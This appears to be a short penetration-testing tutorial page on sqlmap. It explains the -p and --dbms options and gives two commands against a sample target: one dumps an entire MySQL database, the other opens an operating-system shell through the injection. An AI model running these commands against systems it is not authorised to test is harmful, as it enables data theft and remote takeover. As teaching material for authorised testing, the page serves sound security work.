SQL Injection Tools

Database Dump using SQLmap

SQLmap is one of the popular tools for validating a sql injection vulnerability and exploiting it. The tool takes care of checking various flaws such as the ones mentioned in the previous sections before presenting with the option to exploit them.

sqlmap -u http://192.168.1.1/pricelist.php?id=1 -p "id" --dbms=mysql --dump

Two important parameters that are passed to the command,

  • p - the parameter that can be exploited for SQL injection

  • dbms - The type of database

The above command dumps all the information from the database.

Remote Shell Through SQLmap

It is possible to exploit the remote shell vulnerability a database might posses through SQLmap using the following command,

sqlmap -u http://192.168.1.1/pricelist.php?id=1 -p "id" --dbms=mysql --os-shell

Last updated